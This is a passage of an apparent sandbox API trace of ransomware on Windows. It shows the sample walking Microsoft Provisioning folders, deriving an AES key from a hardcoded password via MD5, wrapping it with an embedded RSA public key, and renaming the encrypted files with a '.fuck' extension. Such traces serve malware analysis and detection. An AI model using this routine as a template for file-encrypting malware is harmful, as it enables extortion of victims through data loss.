(normalized: "c:\\programdata\\microsoft\\provisioning\\countrytable.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.996] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\countrytable.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.996] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.996] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2832730) returned 1 [0237.001] CryptCreateHash (in: hProv=0x2832730, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0237.001] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.001] CryptHashData (hHash=0x2817458, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.001] CryptDeriveKey (in: hProv=0x2832730, Algid=0x6610, hBaseData=0x2817458, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2817098) returned 1 [0237.001] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.001] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0237.002] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2833038) returned 1 [0237.003] CryptImportPublicKeyInfo (in: hCryptProv=0x2833038, dwCertEncodingType=0x1, pInfo=0x283b228*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283b258*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283b260*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2817658) returned 1 [0237.003] CryptEncrypt (in: hKey=0x2817658, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0237.003] CryptEncrypt (in: hKey=0x2817658, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2832840*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2832840*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0237.003] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2832840, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0237.003] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0237.003] CryptEncrypt (in: hKey=0x2817098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0237.003] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0237.003] CloseHandle (hObject=0xffffffff) returned 1 [0237.003] CloseHandle (hObject=0xffffffff) returned 1 [0237.003] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\countrytable.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\countrytable.xml"), bFailIfExists=0) returned 0 [0237.004] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml", dwFileAttributes=0x0) returned 0 [0237.004] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\countrytable.xml.gsg")) returned 0 [0237.004] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\countrytable.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\countrytable.xml.fuck")) returned 0 [0237.004] CryptDestroyHash (hHash=0x2817458) returned 1 [0237.005] CryptDestroyKey (hKey=0x2817098) returned 1 [0237.005] CryptReleaseContext (hProv=0x2832730, dwFlags=0x0) returned 1 [0237.005] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.005] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2817298 [0237.006] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.006] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.006] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.006] GetLastError () returned 0x5 [0237.006] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml")) returned 0x20 [0237.006] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.006] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.007] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.007] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.007] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2833588) returned 1 [0237.012] CryptCreateHash (in: hProv=0x2833588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.012] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.012] CryptHashData (hHash=0x2817098, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.012] CryptDeriveKey (in: hProv=0x2833588, Algid=0x6610, hBaseData=0x2817098, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2817818) returned 1 [0237.012] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.012] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.012] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2832730) returned 1 [0237.014] CryptImportPublicKeyInfo (in: hCryptProv=0x2832730, dwCertEncodingType=0x1, pInfo=0x283a6c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283a6f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283a700*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2817898) returned 1 [0237.014] CryptEncrypt (in: hKey=0x2817898, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.014] CryptEncrypt (in: hKey=0x2817898, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2832950*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2832950*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.014] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2832950, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.014] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.014] CryptEncrypt (in: hKey=0x2817818, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.014] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.014] CloseHandle (hObject=0xffffffff) returned 1 [0237.014] CloseHandle (hObject=0xffffffff) returned 1 [0237.014] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.015] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.015] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg")) returned 0 [0237.015] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.fuck")) returned 0 [0237.016] CryptDestroyHash (hHash=0x2817098) returned 1 [0237.016] CryptDestroyKey (hKey=0x2817818) returned 1 [0237.016] CryptReleaseContext (hProv=0x2833588, dwFlags=0x0) returned 1 [0237.016] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.016] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.016] GetLastError () returned 0x5 [0237.016] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml")) returned 0x20 [0237.017] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.017] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.017] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.018] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.018] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2832f28) returned 1 [0237.023] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.023] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.023] CryptHashData (hHash=0x2817098, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.023] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817098, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2817918) returned 1 [0237.023] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.023] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.024] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28329d8) returned 1 [0237.025] CryptImportPublicKeyInfo (in: hCryptProv=0x28329d8, dwCertEncodingType=0x1, pInfo=0x283b638*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283b668*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283b670*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2817a98) returned 1 [0237.025] CryptEncrypt (in: hKey=0x2817a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.025] CryptEncrypt (in: hKey=0x2817a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28332e0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28332e0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.025] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28332e0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.025] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.025] CryptEncrypt (in: hKey=0x2817918, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.025] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.025] CloseHandle (hObject=0xffffffff) returned 1 [0237.025] CloseHandle (hObject=0xffffffff) returned 1 [0237.025] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.026] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.026] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml.gsg")) returned 0 [0237.027] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml.fuck")) returned 0 [0237.027] CryptDestroyHash (hHash=0x2817098) returned 1 [0237.027] CryptDestroyKey (hKey=0x2817918) returned 1 [0237.027] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.027] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.027] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2817098 [0237.028] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.028] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.028] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2817458 [0237.028] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.028] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.028] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.028] GetLastError () returned 0x5 [0237.028] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.028] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.028] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.029] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.029] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.029] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2833368) returned 1 [0237.034] CryptCreateHash (in: hProv=0x2833368, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.034] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.034] CryptHashData (hHash=0x2817798, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.034] CryptDeriveKey (in: hProv=0x2833368, Algid=0x6610, hBaseData=0x2817798, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2817a18) returned 1 [0237.034] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.034] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.034] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2832a60) returned 1 [0237.036] CryptImportPublicKeyInfo (in: hCryptProv=0x2832a60, dwCertEncodingType=0x1, pInfo=0x283ad48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", 